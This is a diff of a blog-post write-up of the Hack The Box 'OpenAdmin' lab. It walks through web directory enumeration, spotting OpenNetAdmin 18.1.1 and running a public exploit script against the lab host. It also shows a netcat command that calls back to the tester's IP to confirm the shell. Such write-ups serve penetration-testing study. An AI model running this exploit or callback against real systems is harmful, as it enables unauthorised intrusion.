ongyuann/ongyuann.github.io/_posts/2020-05-28-htb-openadmin.md

 /sierra (Status: 301)
 ```

 `/artwork` gives you nothing but some landing page for 'Arcwork'.
 `/music` gives you some landing page for a music company, but if you click the 'login' button at the top, you get redirected to _completely_ different-looking site at `/ona`.

 Now at this point, `/ona` looks sufficiently interesting for 2 reasons:
-1- It looks really different from its parent site at `/music` - in fact it's not even a sub-directory of `/music`, with the page located at `http://openadmin.htb/ona/`.
+1. It looks really different from its parent site at `/music` - in fact it's not even a sub-directory of `/music`, with the page located at `http://openadmin.htb/ona/`.
-2- There's a version number that almost literally pops right out at you - version 18.1.1.
+2. There's a version number that almost literally pops right out at you - version 18.1.1.
 Now if you've done enough OSCP / HTB, version numbers are always a good place to start.

 ### Shell as www-data
 Googling `ona 18.1.1 exploit` should yield you [this first result](https://www.exploit-db.com/exploits/47691).

 The exploit basically gives you a shell with no feedback (as in no stdout).
 You can verify whether it works by triggering a callback to your machine.

-Example: running the exploit to point at `http://openadmin.htb/ona/` (note: somehow you must add a `\` at the end for this to work) and running a nc callback `nc -nc <ur_ip> 4444`
+Example: running the exploit to point at `http://openadmin.htb/ona/` and running a nc callback `nc -nc <ur_ip> 4444` (Note: somehow you must add a `\` at the end or the URL for this to work)
 ```
 kali@kali:~$ ./ona.sh http://openadmin.htb/ona/
 $ nc -nv 10.10.14.64 4444